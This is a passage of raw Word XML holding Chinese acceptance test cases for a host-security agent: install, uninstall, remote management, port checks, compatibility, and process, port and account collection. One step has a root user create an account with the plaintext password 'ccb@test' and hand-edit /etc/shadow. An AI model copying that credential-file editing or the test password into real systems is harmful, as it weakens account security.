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pPr>
      <w:bookmarkStart w:id="0" w:name="_Toc1896980849"/>
      <w:bookmarkStart w:id="1" w:name="_Toc19135"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>通过性测试用例</w:t>
      </w:r>
      <w:bookmarkEnd w:id="0"/>
      <w:bookmarkEnd w:id="1"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:bookmarkStart w:id="2" w:name="_Toc1014905781"/>
      <w:bookmarkStart w:id="3" w:name="_Toc31945"/>
      <w:r>
        <w:t>Agent</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>管理功能</w:t>
      </w:r>
      <w:bookmarkEnd w:id="2"/>
      <w:bookmarkEnd w:id="3"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:bookmarkStart w:id="4" w:name="_Toc31921"/>
      <w:bookmarkStart w:id="5" w:name="_Toc58853146"/>
      <w:r>
        <w:t>Agent一键安装</w:t>
      </w:r>
      <w:bookmarkEnd w:id="4"/>
      <w:bookmarkEnd w:id="5"/>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Agent一键安装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测试</w:t>
            </w:r>
            <w:r>
              <w:t>主机安全产品支持采用一键式安装方法，自动从堡垒机下载安装包，并执行安装程序，完成安装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t>主机操作系统到堡垒机、服务端网络访问关系通畅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4"/>
              </w:numPr>
            </w:pPr>
            <w:r>
              <w:t>登录服务端</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="50"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="4"/>
              </w:numPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>找到相应安装部署模块，</w:t>
            </w:r>
            <w:r>
              <w:t>获取一键安装命令。</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="50"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="4"/>
              </w:numPr>
            </w:pPr>
            <w:r>
              <w:t>分别登录</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>测试机</w:t>
            </w:r>
            <w:r>
              <w:t>，执行安装命令。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结果1：</w:t>
            </w:r>
            <w:r>
              <w:t>在测试机上执行ps -ef | grep ‘进程名’ 或tasklis</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>t</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> | findstr 进程名 查看主机安全客户端进程存在。</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>结果2：</w:t>
            </w:r>
            <w:r>
              <w:t>登录服务端，能够看到新安装的主机。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6" w:name="_Toc1302347202"/>
      <w:bookmarkStart w:id="7" w:name="_Toc14547"/>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
      <w:r>
        <w:t>Agent远程卸载</w:t>
      </w:r>
      <w:bookmarkEnd w:id="6"/>
      <w:bookmarkEnd w:id="7"/>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Agent</w:t>
            </w:r>
            <w:r>
              <w:t>远程卸载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测试</w:t>
            </w:r>
            <w:r>
              <w:t>主机安全产品支持在服务端进行远程卸载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lang w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>预置条件</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="仿宋_GB2312" w:hAnsi="宋体" w:eastAsia="仿宋_GB2312"/>
              </w:rPr>
              <w:t>:</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7812" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>主机操作系统到服务端网络访问关系通畅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5"/>
              </w:numPr>
              <w:ind w:left="420" w:leftChars="200"/>
            </w:pPr>
            <w:r>
              <w:t>登录服务端</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="50"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="5"/>
              </w:numPr>
              <w:ind w:left="420" w:leftChars="200"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>找到相应安装部署模块，</w:t>
            </w:r>
            <w:r>
              <w:t>找到测试主机，点击卸载。</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="50"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="5"/>
              </w:numPr>
              <w:ind w:left="420" w:leftChars="200"/>
            </w:pPr>
            <w:r>
              <w:t>查看测试主机上客户端进程是否存在。</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="50"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="5"/>
              </w:numPr>
              <w:ind w:left="420" w:leftChars="200"/>
            </w:pPr>
            <w:r>
              <w:t>登录服务端</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>，</w:t>
            </w:r>
            <w:r>
              <w:t>刷新页面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结果1：</w:t>
            </w:r>
            <w:r>
              <w:t>在测试机上执行ps -ef | grep ‘进程名’ 或tasklis</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>t</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> | findstr 进程名 查看主机安全客户端进程不存在</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>结果2：</w:t>
            </w:r>
            <w:r>
              <w:t>主机</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>显示为已卸载</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8" w:name="_Toc5899"/>
      <w:bookmarkStart w:id="9" w:name="_Toc1396093790"/>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
      <w:r>
        <w:t>Agent远程管理</w:t>
      </w:r>
      <w:bookmarkEnd w:id="8"/>
      <w:bookmarkEnd w:id="9"/>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t>Agent远程管理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测试</w:t>
            </w:r>
            <w:r>
              <w:t>主机安全产品支持在服务端进行远程管理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t>主机操作系统到服务端网络访问关系通畅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6"/>
              </w:numPr>
              <w:ind w:firstLine="0" w:firstLineChars="0"/>
            </w:pPr>
            <w:r>
              <w:t>登录服务端</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="50"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="6"/>
              </w:numPr>
              <w:ind w:firstLine="0" w:firstLineChars="0"/>
            </w:pPr>
            <w:r>
              <w:t>在</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>主机管理模块可以找到</w:t>
            </w:r>
            <w:r>
              <w:t>测试主机，可以查看</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>主机基础信息</w:t>
            </w:r>
            <w:r>
              <w:t>。</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="50"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="6"/>
              </w:numPr>
              <w:ind w:firstLine="0" w:firstLineChars="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>在Agent管理页面可以查看客户端版本、运行状态</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="50"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="6"/>
              </w:numPr>
              <w:ind w:firstLine="0" w:firstLineChars="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>在服务端对Oracle-76-01停用Agent</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="50"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="6"/>
              </w:numPr>
              <w:ind w:firstLine="0" w:firstLineChars="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>在服务端对Oracle-76-01启用Agent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结果1（步骤2-3）：</w:t>
            </w:r>
            <w:r>
              <w:t>能够看到客户端运行状态、版本信息。</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>结果2（步骤4-5）：</w:t>
            </w:r>
            <w:r>
              <w:t>执行完成客户端重启后，登录测试机查看</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>核心</w:t>
            </w:r>
            <w:r>
              <w:t>进程启动时间。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10" w:name="_Toc742001408"/>
      <w:bookmarkStart w:id="11" w:name="_Toc12796"/>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Agent安全性</w:t>
      </w:r>
      <w:bookmarkEnd w:id="10"/>
      <w:bookmarkEnd w:id="11"/>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t>Agent</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>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测试</w:t>
            </w:r>
            <w:r>
              <w:t>主机安全产品</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>安装后是否会增加安全风险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t>主机操作系统到服务端网络访问关系通畅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7"/>
              </w:numPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>主机安装Agent之前执行netstat -tnlp查看已侦听的端口</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="50"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="7"/>
              </w:numPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>在测试主机上安装Agent</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="50"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="7"/>
              </w:numPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>安装好Agent之后执行netstat -tnlp查看的侦听端口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结果：安装Agent不会新增对外的侦听端口</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12" w:name="_Toc14347"/>
      <w:bookmarkStart w:id="13" w:name="_Toc380126127"/>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Agent兼容性</w:t>
      </w:r>
      <w:bookmarkEnd w:id="12"/>
      <w:bookmarkEnd w:id="13"/>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t>Agent</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>兼容性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测试</w:t>
            </w:r>
            <w:r>
              <w:t>主机安全产品</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>支持主流Windows、Linux操作系统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t>主机操作系统到服务端网络访问关系通畅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8"/>
              </w:numPr>
              <w:ind w:firstLine="0" w:firstLineChars="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>在Oracle Linux、RedHat、Windows测试机器上安装Agent</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="50"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="8"/>
              </w:numPr>
              <w:ind w:firstLine="0" w:firstLineChars="0"/>
            </w:pPr>
            <w:r>
              <w:t>在</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>主机管理模块查看</w:t>
            </w:r>
            <w:r>
              <w:t>测试主机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结果1：</w:t>
            </w:r>
            <w:r>
              <w:t>能够</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>安装成功</w:t>
            </w:r>
            <w:r>
              <w:t>。</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>结果2：服务端</w:t>
            </w:r>
            <w:r>
              <w:t>可以查看</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>主机基础信息</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3"/>
      </w:pPr>
      <w:bookmarkStart w:id="14" w:name="_Toc15966664"/>
      <w:bookmarkStart w:id="15" w:name="_Toc31274"/>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>功能指标</w:t>
      </w:r>
      <w:bookmarkEnd w:id="14"/>
      <w:bookmarkEnd w:id="15"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:bookmarkStart w:id="16" w:name="_Toc2063749620"/>
      <w:bookmarkStart w:id="17" w:name="_Toc27673"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>资产信息总览</w:t>
      </w:r>
      <w:bookmarkEnd w:id="16"/>
      <w:bookmarkEnd w:id="17"/>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="27"/>
        <w:tblW w:w="91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87" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cs="Arial" w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>主机信息总览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87" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cs="Arial" w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:cs="Arial" w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
              </w:rPr>
              <w:t>总体概览当前主机资产信息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87" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cs="Arial" w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>预先安装ag</w:t>
            </w:r>
            <w:r>
              <w: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87" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:tabs>
                <w:tab w:val="left" w:pos="312"/>
              </w:tabs>
              <w:rPr>
                <w:rFonts w:cs="Arial" w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:cs="Arial" w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
              </w:rP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87" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="9"/>
              </w:numPr>
              <w:rPr>
                <w:rFonts w:cs="Arial" w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:cs="Arial" w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
              </w:rPr>
              <w:t>登录服务端</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="9"/>
              </w:numPr>
              <w:rPr>
                <w:rFonts w:cs="Arial" w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:cs="Arial" w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
              </w:rPr>
              <w:t>找到资产信息总览模块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87"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rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>能够对采集上来的资产形成总体的资产视图，并通过不同图或标签整体展示资产信息</w:t>
            </w:r>
          </w:p>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87"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87"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87"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87"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87"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18" w:name="_Toc3541"/>
      <w:bookmarkStart w:id="19" w:name="_Toc1431480643"/>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>进程信息采集</w:t>
      </w:r>
      <w:bookmarkEnd w:id="18"/>
      <w:bookmarkEnd w:id="19"/>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进程信息采集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查看当前主机运行的所有进程相关信息，为安全事件分析提供协助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pPr>
              <w:rPr>
                <w:rFonts w:ascii="仿宋" w:hAnsi="仿宋" w:eastAsia="仿宋"/>
                <w:szCs w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>预先安装ag</w:t>
            </w:r>
            <w:r>
              <w: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ascii="仿宋_GB2312" w:hAnsi="宋体" w:eastAsia="仿宋_GB2312"/>
              </w:rPr>
              <w:t>测试拓扑</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7812" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:tabs>
                <w:tab w:val="left" w:pos="312"/>
              </w:tabs>
              <w:rPr>
                <w:rFonts w:cs="Arial" w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:cs="Arial" w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
              </w:rP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numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="10"/>
              </w:numPr>
              <w:rPr>
                <w:rFonts w:cs="Arial" w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:cs="Arial" w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
              </w:rPr>
              <w:t>登录服务端</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="10"/>
              </w:numPr>
              <w:rPr>
                <w:rFonts w:cs="Arial" w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:cs="Arial" w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
              </w:rPr>
              <w:t>找到进程模块并点击进入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模块内按主机维度和进程维度显示所有主机运行的所有进程相关信息，包括进程名、进程路径、PID、用户等；以及进程维度下所有进程所在的主机信息；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20" w:name="_Toc635869560"/>
      <w:bookmarkStart w:id="21" w:name="_Toc8376"/>
      <w:bookmarkStart w:id="22" w:name="_Toc431331273"/>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>端口信息采集</w:t>
      </w:r>
      <w:bookmarkEnd w:id="20"/>
      <w:bookmarkEnd w:id="21"/>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端口信息采集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通过查询端口号检测进程情况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rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>预先安装ag</w:t>
            </w:r>
            <w:r>
              <w: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pPr>
              <w:tabs>
                <w:tab w:val="left" w:pos="312"/>
              </w:tabs>
              <w:rPr>
                <w:rFonts w:cs="Arial" w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:cs="Arial" w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
              </w:rP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numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="11"/>
              </w:numPr>
              <w:rPr>
                <w:rFonts w:cs="Arial" w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:cs="Arial" w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
              </w:rPr>
              <w:t>登录服务端</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="11"/>
              </w:numPr>
              <w:rPr>
                <w:rFonts w:cs="Arial" w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:cs="Arial" w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
              </w:rPr>
              <w:t>找到端口模块并点击进入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显示所有主机所运行进程绑定的端口相关信息，</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>端口包括：</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>Oracle-76-01—80、8080</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>Oracle-76-02—3306、</w:t>
            </w:r>
            <w:r>
              <w:t>1521</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>Redhat-67-01—5432、10080</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>采集内容包括端口号、服务名、进程名、协议、端口访问性；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bookmarkEnd w:id="22"/>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:bookmarkStart w:id="23" w:name="_Toc1181067448"/>
      <w:bookmarkStart w:id="24" w:name="_Toc9142"/>
      <w:bookmarkStart w:id="25" w:name="_Toc465690974"/>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
      <w:r>
        <w:t>账号</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>信息</w:t>
      </w:r>
      <w:r>
        <w:t>采集</w:t>
      </w:r>
      <w:bookmarkEnd w:id="23"/>
      <w:bookmarkEnd w:id="24"/>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="27"/>
        <w:tblpPr w:leftFromText="180" w:rightFromText="180" w:vertAnchor="text" w:tblpX="108" w:tblpY="1"/>
        <w:tblOverlap w:val="never"/>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系统账号采集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支持采集主机上的账号信息，可采集账号的用户名、是否Root权限、上次登录时间、所属用户组、密码过期时间、上次密码修改时间；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rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>预先安装ag</w:t>
            </w:r>
            <w:r>
              <w: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pPr>
              <w:pStyle w:val="74"/>
              <w:ind w:firstLine="0" w:firstLineChars="0"/>
              <w:rPr>
                <w:rFonts w:cs="Arial" w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cs="Arial" w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
              </w:rP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74"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="12"/>
              </w:numPr>
              <w:ind w:firstLineChars="0"/>
              <w:rPr>
                <w:rFonts w:cs="Arial" w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:cs="Arial" w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
              </w:rPr>
              <w:t>Oracle-76-01上登录root后执行useradd test新建用户test，执行passwd test根据提示修改</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:cs="Arial" w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
              </w:rPr>
              <w:t>密码为</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:cs="Arial" w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
              </w:rPr>
              <w:t>ccb@test</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="74"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="12"/>
              </w:numPr>
              <w:ind w:firstLineChars="0"/>
              <w:rPr>
                <w:rFonts w:cs="Arial" w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:cs="Arial" w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
              </w:rPr>
              <w:t>执行su - test</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="74"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="12"/>
              </w:numPr>
              <w:ind w:firstLineChars="0"/>
              <w:rPr>
                <w:rFonts w:cs="Arial" w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:cs="Arial" w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
              </w:rPr>
              <w:t>执行exit，退回到root账户下vi /etc/shadow</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:cs="Arial" w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve"> 找到</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:cs="Arial" w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
              </w:rPr>
              <w:t>test</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:cs="Arial" w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
              </w:rPr>
              <w:t>的密码过期字段</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:cs="Arial" w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
              </w:rPr>
              <w:t>（第五个字段）</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:cs="Arial" w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
              </w:rPr>
              <w:t>修改为</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:cs="Arial" w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
              </w:rPr>
              <w:t>500</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="74"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="12"/>
              </w:numPr>
              <w:ind w:firstLineChars="0"/>
              <w:rPr>
                <w:rFonts w:cs="Arial" w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:cs="Arial" w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
              </w:rPr>
              <w:t>重新采集资产</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cs="Arial"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支持采集主机上的test账号信息:</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="13"/>
              </w:numPr>
            </w:pPr>
            <w:r>
